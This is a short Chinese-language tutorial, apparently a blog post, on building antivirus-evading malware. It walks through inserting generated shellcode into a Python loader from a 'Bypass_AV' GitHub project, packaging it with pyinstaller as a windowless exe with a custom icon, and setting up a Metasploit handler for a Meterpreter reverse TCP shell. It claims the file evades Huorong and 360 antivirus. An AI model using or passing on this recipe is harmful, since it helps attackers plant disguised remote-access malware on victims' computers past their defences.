项目地址:https://github.com/Axx8/Bypass_AV
生成shellcode,ip与端口替换
将生成的shellcode复制下来放入项目中的py文件
将shellcode复制到这里
保存py文件,使用pyinstaller模块进行打包,打包命令如下:
pyinstaller.exe -F -w .\Bypass_AV.py -i .\favicon.ico
有需要可以-i,将ico图标封装到exe中
在dist目录下可以找到生成的exe文件
启动msf,开启监听
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8080
msf6 exploit(multi/handler) > run
点击exe成功上线,
输入shell进入,出现乱码情况输入 chcp 65001
也可以将msf的shell反弹到cs上,详情请看第一篇文章
免杀效果如下:可过火绒与360